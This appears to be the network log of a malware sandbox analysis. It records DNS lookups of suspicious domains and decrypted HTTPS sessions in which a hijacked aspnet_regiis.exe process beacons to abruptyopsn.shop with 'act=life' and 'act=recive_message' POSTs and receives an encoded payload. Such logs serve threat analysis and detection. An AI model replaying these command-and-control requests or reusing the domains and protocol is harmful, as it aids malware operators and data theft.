Dec 30, 2024 21:09:06.943664074 CET	443	49731	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:06.943712950 CET	49731	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:06.943725109 CET	443	49731	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:06.943861961 CET	443	49731	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:06.943912029 CET	49731	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:06.943922043 CET	443	49731	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:06.944037914 CET	443	49731	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:06.944081068 CET	49731	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:06.944091082 CET	443	49731	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:06.944225073 CET	443	49731	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:06.944286108 CET	49731	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:06.944295883 CET	443	49731	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:06.986635923 CET	49731	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:06.986660957 CET	443	49731	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:07.033529997 CET	49731	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:07.055269003 CET	443	49731	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:07.055622101 CET	443	49731	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:07.055684090 CET	49731	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:07.055746078 CET	49731	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:07.055783987 CET	443	49731	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:07.055813074 CET	49731	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:07.055826902 CET	443	49731	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:07.194087029 CET	49733	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:07.194120884 CET	443	49733	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:07.194210052 CET	49733	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:07.194495916 CET	49733	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:07.194510937 CET	443	49733	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:07.725819111 CET	443	49733	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:07.725900888 CET	49733	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:07.726952076 CET	49733	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:07.726959944 CET	443	49733	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:07.727185011 CET	443	49733	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:07.728826046 CET	49733	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:07.728960991 CET	49733	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:07.728993893 CET	443	49733	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:07.729060888 CET	49733	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:07.729069948 CET	443	49733	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:09.823618889 CET	443	49733	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:09.823870897 CET	443	49733	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:09.823925972 CET	49733	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:09.824008942 CET	49733	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:09.824023008 CET	443	49733	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:09.975588083 CET	49738	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:09.975615025 CET	443	49738	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:09.975681067 CET	49738	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:09.976061106 CET	49738	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:09.976077080 CET	443	49738	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:10.474777937 CET	443	49738	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:10.474875927 CET	49738	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:10.476178885 CET	49738	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:10.476188898 CET	443	49738	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:10.476506948 CET	443	49738	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:10.485171080 CET	49738	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:10.485311985 CET	49738	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:10.485348940 CET	443	49738	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:10.945103884 CET	443	49738	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:10.945369959 CET	443	49738	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:10.945422888 CET	49738	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:10.945561886 CET	49738	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:10.945579052 CET	443	49738	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:11.282272100 CET	49740	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:11.282315969 CET	443	49740	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:11.282458067 CET	49740	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:11.282948971 CET	49740	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:11.282965899 CET	443	49740	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:11.745044947 CET	443	49740	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:11.745125055 CET	49740	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:11.747241974 CET	49740	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:11.747253895 CET	443	49740	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:11.747503042 CET	443	49740	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:11.791625977 CET	49740	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:11.791771889 CET	49740	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:11.791872978 CET	443	49740	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:11.791980028 CET	49740	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:11.791992903 CET	443	49740	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:12.505089998 CET	443	49740	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:12.505367041 CET	443	49740	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:12.505439997 CET	49740	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:12.505543947 CET	49740	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:12.505567074 CET	443	49740	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:12.826339006 CET	49742	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:12.826384068 CET	443	49742	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:12.826493979 CET	49742	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:12.826828003 CET	49742	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:12.826842070 CET	443	49742	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:13.309119940 CET	443	49742	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:13.309211016 CET	49742	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:13.310435057 CET	49742	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:13.310444117 CET	443	49742	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:13.310672998 CET	443	49742	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:13.312536001 CET	49742	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:13.312609911 CET	49742	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:13.312613010 CET	443	49742	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:13.619580984 CET	443	49742	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:13.619668961 CET	443	49742	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:13.619715929 CET	49742	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:13.619939089 CET	49742	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:13.619970083 CET	443	49742	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:13.698456049 CET	49744	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:13.698513031 CET	443	49744	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:13.698627949 CET	49744	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:13.698918104 CET	49744	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:13.698935032 CET	443	49744	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:14.157356977 CET	443	49744	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:14.157571077 CET	49744	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:14.159112930 CET	49744	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:14.159125090 CET	443	49744	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:14.159370899 CET	443	49744	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:14.160517931 CET	49744	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:14.160631895 CET	49744	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:14.160638094 CET	443	49744	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:15.279975891 CET	443	49744	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:15.280081987 CET	443	49744	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:15.280136108 CET	49744	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:15.280344009 CET	49744	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:15.280368090 CET	443	49744	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:15.323697090 CET	49746	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:15.323738098 CET	443	49746	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:15.323802948 CET	49746	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:15.324327946 CET	49746	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:15.324342012 CET	443	49746	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:15.787412882 CET	443	49746	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:15.787491083 CET	49746	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:15.790550947 CET	49746	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:15.790561914 CET	443	49746	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:15.790801048 CET	443	49746	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:15.791922092 CET	49746	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:15.791950941 CET	49746	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:15.791981936 CET	443	49746	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:16.303477049 CET	443	49746	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:16.303571939 CET	443	49746	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:16.303638935 CET	49746	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:16.304012060 CET	49746	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:16.304034948 CET	443	49746	104.21.48.1	192.168.2.4
Dec 30, 2024 21:09:16.304049015 CET	49746	443	192.168.2.4	104.21.48.1
Dec 30, 2024 21:09:16.304058075 CET	443	49746	104.21.48.1	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 30, 2024 21:09:04.695492983 CET	62822	53	192.168.2.4	1.1.1.1
Dec 30, 2024 21:09:04.705519915 CET	53	62822	1.1.1.1	192.168.2.4
Dec 30, 2024 21:09:04.709423065 CET	57924	53	192.168.2.4	1.1.1.1
Dec 30, 2024 21:09:04.718127012 CET	53	57924	1.1.1.1	192.168.2.4
Dec 30, 2024 21:09:04.723227978 CET	52798	53	192.168.2.4	1.1.1.1
Dec 30, 2024 21:09:04.736599922 CET	53	52798	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 30, 2024 21:09:04.695492983 CET	192.168.2.4	1.1.1.1	0x6f8	Standard query (0)	ingreem-eilish.biz	A (IP address)	IN (0x0001)	false
Dec 30, 2024 21:09:04.709423065 CET	192.168.2.4	1.1.1.1	0x4cfd	Standard query (0)	nearycrepso.shop	A (IP address)	IN (0x0001)	false
Dec 30, 2024 21:09:04.723227978 CET	192.168.2.4	1.1.1.1	0x5d3d	Standard query (0)	abruptyopsn.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 30, 2024 21:09:04.705519915 CET	1.1.1.1	192.168.2.4	0x6f8	Name error (3)	ingreem-eilish.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 30, 2024 21:09:04.718127012 CET	1.1.1.1	192.168.2.4	0x4cfd	Name error (3)	nearycrepso.shop	none	none	A (IP address)	IN (0x0001)	false
Dec 30, 2024 21:09:04.736599922 CET	1.1.1.1	192.168.2.4	0x5d3d	No error (0)	abruptyopsn.shop		104.21.48.1	A (IP address)	IN (0x0001)	false
Dec 30, 2024 21:09:04.736599922 CET	1.1.1.1	192.168.2.4	0x5d3d	No error (0)	abruptyopsn.shop		104.21.64.1	A (IP address)	IN (0x0001)	false
Dec 30, 2024 21:09:04.736599922 CET	1.1.1.1	192.168.2.4	0x5d3d	No error (0)	abruptyopsn.shop		104.21.112.1	A (IP address)	IN (0x0001)	false
Dec 30, 2024 21:09:04.736599922 CET	1.1.1.1	192.168.2.4	0x5d3d	No error (0)	abruptyopsn.shop		104.21.32.1	A (IP address)	IN (0x0001)	false
Dec 30, 2024 21:09:04.736599922 CET	1.1.1.1	192.168.2.4	0x5d3d	No error (0)	abruptyopsn.shop		104.21.16.1	A (IP address)	IN (0x0001)	false
Dec 30, 2024 21:09:04.736599922 CET	1.1.1.1	192.168.2.4	0x5d3d	No error (0)	abruptyopsn.shop		104.21.80.1	A (IP address)	IN (0x0001)	false
Dec 30, 2024 21:09:04.736599922 CET	1.1.1.1	192.168.2.4	0x5d3d	No error (0)	abruptyopsn.shop		104.21.96.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

abruptyopsn.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.21.48.1	443	2492	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 20:09:05 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: abruptyopsn.shop
2024-12-30 20:09:05 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-30 20:09:05 UTC	1123	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 20:09:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=t1fmef995inhhd747meenb9f32; expires=Fri, 25 Apr 2025 13:55:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=42Xi65m%2BKg5B7KoR2bbXqAEUlmVKOt7uhRUmMPfilKgh4TZFFHu25Xqa7IHsSm7lXqh%2FyeDIE92vA1MB1rP6WuadPqMh0uj99SWy%2B8ydLvk8ZYRy5GD6yNuJ60q%2B5WXKWJMb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa4aa61bd2643be-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1632&min_rtt=1620&rtt_var=632&sent=7&recv=7&lost=0&retrans=0&sent_bytes=3053&recv_bytes=907&delivery_rate=2545031&cwnd=227&unsent_bytes=0&cid=2885177b8acfa2dd&ts=677&x=0"
2024-12-30 20:09:05 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-30 20:09:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	104.21.48.1	443	2492	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 20:09:06 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 86 Host: abruptyopsn.shop
2024-12-30 20:09:06 UTC	86	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 37 33 66 38 32 65 65 64 36 35 32 31 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--73f82eed6521&j=b9abc76ce53b6fc3a03566f8f764f5ea
2024-12-30 20:09:06 UTC	1117	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 20:09:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=421h3a75dgsrkdc2thvvvnh7ni; expires=Fri, 25 Apr 2025 13:55:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ufsO32sM0oxvbZiimB7K6XpHsKBdpmrvHP8W05ujWTBKu68rpI2ThXdbxp82ieeq39LNzTo5OM7RQxRIlXNVeYDeQG6dvtbCxbeEupqNp60ofzfjQsfgfvSj%2FmpFWqA1C7bY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa4aa67c8638c15-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1879&min_rtt=1825&rtt_var=793&sent=7&recv=8&lost=0&retrans=0&sent_bytes=3052&recv_bytes=986&delivery_rate=1937195&cwnd=239&unsent_bytes=0&cid=3982c03b20b03de1&ts=496&x=0"
2024-12-30 20:09:06 UTC	252	IN	Data Raw: 34 37 30 0d 0a 54 73 54 6b 58 4b 53 67 68 31 78 72 4b 6c 71 6c 4b 37 54 66 67 47 46 74 59 34 72 77 50 70 44 53 51 32 6a 6c 53 4a 56 52 49 63 49 31 35 70 4a 2b 6e 70 53 72 66 68 68 50 65 4a 39 4e 31 62 50 7a 42 45 46 42 36 35 51 63 71 72 51 69 42 4a 59 74 75 58 4e 58 72 32 7a 2b 67 6a 33 49 30 2b 4a 77 53 55 38 69 68 78 48 76 70 4b 49 45 41 30 47 77 30 6c 76 36 73 43 49 45 68 79 6e 2b 50 6c 47 75 4c 61 79 49 4f 38 7a 46 35 44 67 4b 52 6a 66 41 54 74 47 2b 36 67 38 45 44 75 4b 64 48 4c 7a 77 4a 68 4c 48 63 72 63 63 52 4c 59 76 69 59 55 76 7a 34 4c 36 63 42 41 49 50 38 73 4a 6a 76 33 68 42 41 38 50 37 4a 52 56 2b 4c 6f 72 44 49 59 73 2f 79 46 49 70 43 61 73 68 6a 6a 4e 7a 2b 30 73 42 30 77 77 79 30 6a 62 76 71 4a 4e 54 77 62 77 30 67 53 79 34 78 4d Data Ascii: 470TsTkXKSgh1xrKlqlK7TfgGFtY4rwPpDSQ2jlSJVRIcI15pJ+npSrfhhPeJ9N1bPzBEFB65QcqrQiBJYtuXNXr2z+gj3I0+JwSU8ihxHvpKIEA0Gw0lv6sCIEhyn+PlGuLayIO8zF5DgKRjfATtG+6g8EDuKdHLzwJhLHcrccRLYviYUvz4L6cBAIP8sJjv3hBA8P7JRV+LorDIYs/yFIpCashjjNz+0sB0wwy0jbvqJNTwbw0gSy4xM
2024-12-30 20:09:06 UTC	891	IN	Data Raw: 4a 6c 6a 76 69 50 6c 4f 6d 62 4c 6e 49 4a 34 62 46 36 58 35 52 43 44 44 4c 52 39 4f 2b 37 51 51 4f 41 66 71 64 58 50 47 34 4b 51 36 4e 4a 66 67 38 54 61 6f 72 72 6f 38 35 79 63 58 74 4f 41 5a 4c 65 49 6b 4a 30 61 57 69 57 30 38 68 2b 4a 46 66 35 72 30 77 53 70 68 6b 37 6e 4e 45 72 47 7a 2b 78 6a 6a 49 77 2b 67 2b 47 30 41 7a 7a 45 7a 45 74 75 73 4f 41 67 48 6c 6d 46 50 78 73 43 59 41 6a 53 58 39 4e 30 36 74 4b 71 61 47 66 6f 69 43 34 69 5a 4a 45 48 6a 6b 54 4d 61 36 37 68 56 4e 4f 36 69 4e 45 75 76 77 4a 67 62 48 63 72 63 37 52 71 4d 76 72 59 6b 39 7a 73 6e 33 50 68 74 4f 4e 63 4a 62 30 4c 6a 73 43 51 77 54 34 70 78 61 38 62 6b 71 41 34 49 74 38 33 4d 4e 34 43 75 2b 78 6d 61 47 34 2b 67 31 42 55 49 76 78 77 6e 4a 38 2f 74 44 43 41 32 6f 79 68 7a 32 73 53 Data Ascii: JljviPlOmbLnIJ4bF6X5RCDDLR9O+7QQOAfqdXPG4KQ6NJfg8Taorro85ycXtOAZLeIkJ0aWiW08h+JFf5r0wSphk7nNErGz+xjjIw+g+G0AzzEzEtusOAgHlmFPxsCYAjSX9N06tKqaGfoiC4iZJEHjkTMa67hVNO6iNEuvwJgbHcrc7RqMvrYk9zsn3PhtONcJb0LjsCQwT4pxa8bkqA4It83MN4Cu+xmaG4+g1BUIvxwnJ8/tDCA2oyhz2sS
2024-12-30 20:09:06 UTC	1369	IN	Data Raw: 33 65 39 63 0d 0a 68 42 7a 74 2f 6a 68 4b 67 43 61 33 61 77 4f 75 49 61 32 4b 4f 63 2f 44 35 6a 34 44 52 6a 66 4e 51 64 36 39 37 77 49 45 43 65 36 66 56 2f 32 2f 4a 67 4b 45 4a 76 49 2b 51 4f 42 69 35 6f 45 6d 68 70 71 6c 47 77 64 4c 4b 64 59 4c 34 37 37 73 44 51 67 58 71 49 30 53 36 2f 41 6d 42 73 64 79 74 7a 6c 45 70 79 69 72 6a 44 33 43 78 75 67 78 41 45 45 78 31 55 50 61 73 2f 41 4f 42 51 54 6d 6e 6c 6e 39 73 43 41 4c 69 53 44 38 63 77 33 67 4b 37 37 47 5a 6f 62 74 36 43 34 62 51 6a 50 57 43 2b 4f 2b 37 41 30 49 46 36 69 4e 45 75 76 77 4a 67 62 48 63 72 63 34 52 61 77 67 70 6f 41 73 79 4d 33 33 4e 42 74 4d 4e 73 4e 46 32 4c 54 76 44 41 6f 54 37 4a 4a 4f 38 37 55 6d 42 49 6f 34 38 6e 4d 4e 34 43 75 2b 78 6d 61 47 2b 4e 45 35 47 56 6b 2f 68 58 7a 56 73 Data Ascii: 3e9chBzt/jhKgCa3awOuIa2KOc/D5j4DRjfNQd697wIECe6fV/2/JgKEJvI+QOBi5oEmhpqlGwdLKdYL477sDQgXqI0S6/AmBsdytzlEpyirjD3CxugxAEEx1UPas/AOBQTmnln9sCALiSD8cw3gK77GZobt6C4bQjPWC+O+7A0IF6iNEuvwJgbHcrc4RawgpoAsyM33NBtMNsNF2LTvDAoT7JJO87UmBIo48nMN4Cu+xmaG+NE5GVk/hXzVs
2024-12-30 20:09:06 UTC	1369	IN	Data Raw: 42 70 74 4a 53 39 4c 42 68 55 70 45 36 34 44 52 63 37 6a 58 6d 67 54 4b 47 6d 71 55 30 47 30 30 32 77 30 50 54 75 65 34 4a 44 77 54 36 6d 6c 72 31 76 43 6b 50 69 43 7a 79 50 6b 53 72 4c 37 53 55 50 63 4c 4d 36 58 35 48 43 44 2f 66 43 59 37 39 78 78 51 4d 45 65 36 52 48 4f 33 2b 4f 45 71 41 4a 72 64 72 41 36 41 69 71 6f 30 35 7a 63 6e 68 4f 67 6c 46 4d 38 6c 48 33 37 48 71 44 77 67 54 35 5a 64 55 2b 4c 6b 6b 42 6f 6f 70 35 54 42 43 34 47 4c 6d 67 53 61 47 6d 71 55 5a 4f 6e 38 62 68 31 61 59 70 4b 49 45 41 30 47 77 30 6c 33 36 74 79 38 4f 6c 53 54 6c 50 55 53 67 4b 71 36 4f 4f 63 72 4d 36 79 77 42 53 54 6a 4a 52 74 36 30 35 67 49 4c 42 65 53 56 48 4c 7a 77 4a 68 4c 48 63 72 63 62 51 4c 6f 32 35 4b 67 31 78 73 58 31 4b 42 49 49 4a 34 6c 51 6c 72 72 75 51 31 Data Ascii: BptJS9LBhUpE64DRc7jXmgTKGmqU0G002w0PTue4JDwT6mlr1vCkPiCzyPkSrL7SUPcLM6X5HCD/fCY79xxQMEe6RHO3+OEqAJrdrA6Aiqo05zcnhOglFM8lH37HqDwgT5ZdU+LkkBoop5TBC4GLmgSaGmqUZOn8bh1aYpKIEA0Gw0l36ty8OlSTlPUSgKq6OOcrM6ywBSTjJRt605gILBeSVHLzwJhLHcrcbQLo25Kg1xsX1KBIIJ4lQlrruQ1
2024-12-30 20:09:06 UTC	1369	IN	Data Raw: 57 2f 37 77 65 55 71 4b 4f 50 59 32 55 61 51 6a 72 5a 51 31 77 4d 4c 67 4c 41 35 45 4d 73 68 4b 33 72 44 68 43 78 30 42 35 5a 4a 4f 34 4c 59 71 42 4d 64 6b 74 7a 52 62 34 48 54 6d 74 79 6e 4e 67 76 70 77 45 41 67 2f 79 77 6d 4f 2f 65 45 4a 41 67 2f 36 6c 6c 72 35 73 79 38 43 67 69 4c 7a 4f 55 36 76 4a 36 79 50 4e 73 62 4e 34 44 59 43 54 6a 62 47 54 39 71 77 6f 6b 31 50 42 76 44 53 42 4c 4b 58 4f 77 65 42 50 65 59 47 52 4b 42 39 35 70 6c 77 33 34 4c 69 4d 6b 6b 51 65 4d 70 46 33 4c 44 6e 42 77 63 47 36 35 4e 51 39 72 30 73 44 6f 34 75 38 69 46 52 70 69 4b 6d 69 54 44 4a 7a 76 63 77 44 45 67 30 68 77 65 57 75 76 70 44 56 30 48 5a 68 56 79 79 72 32 38 54 78 79 33 37 63 78 76 67 49 36 75 55 4d 73 6e 43 35 44 30 4e 51 7a 2f 42 54 39 65 2b 35 77 41 4b 42 2b 6d Data Ascii: W/7weUqKOPY2UaQjrZQ1wMLgLA5EMshK3rDhCx0B5ZJO4LYqBMdktzRb4HTmtynNgvpwEAg/ywmO/eEJAg/6llr5sy8CgiLzOU6vJ6yPNsbN4DYCTjbGT9qwok1PBvDSBLKXOweBPeYGRKB95plw34LiMkkQeMpF3LDnBwcG65NQ9r0sDo4u8iFRpiKmiTDJzvcwDEg0hweWuvpDV0HZhVyyr28Txy37cxvgI6uUMsnC5D0NQz/BT9e+5wAKB+m
2024-12-30 20:09:06 UTC	1369	IN	Data Raw: 79 6b 46 6c 53 2f 2b 4f 30 65 70 4c 4b 4b 4d 4d 38 48 43 34 44 4d 4d 54 44 62 44 54 74 61 78 37 51 51 48 44 75 79 53 55 37 4c 2b 59 51 32 66 61 71 39 7a 59 36 73 36 68 34 67 31 31 49 4c 36 63 42 41 49 50 38 73 4a 6a 76 33 73 43 67 34 4a 35 70 35 55 39 71 49 68 41 59 34 6c 39 6a 78 44 6f 79 32 73 6a 69 7a 41 77 75 34 32 44 6b 41 38 79 56 76 58 73 71 4a 4e 54 77 62 77 30 67 53 79 67 54 63 4e 67 43 57 31 47 6b 53 37 4c 61 79 46 4e 63 71 43 2b 6e 41 51 43 44 2f 4c 43 59 37 39 37 77 38 43 42 66 71 65 58 50 4b 35 4a 67 43 56 4a 66 67 2b 51 4b 41 70 74 49 63 73 79 63 6e 67 50 51 31 48 4e 38 74 42 33 50 32 73 51 77 67 5a 71 4d 6f 63 33 72 4d 77 41 4d 55 4e 37 53 56 45 72 44 32 74 69 7a 4b 47 33 61 73 6e 53 55 38 30 68 78 47 57 76 65 4d 4f 48 51 54 70 6d 46 62 2f Data Ascii: 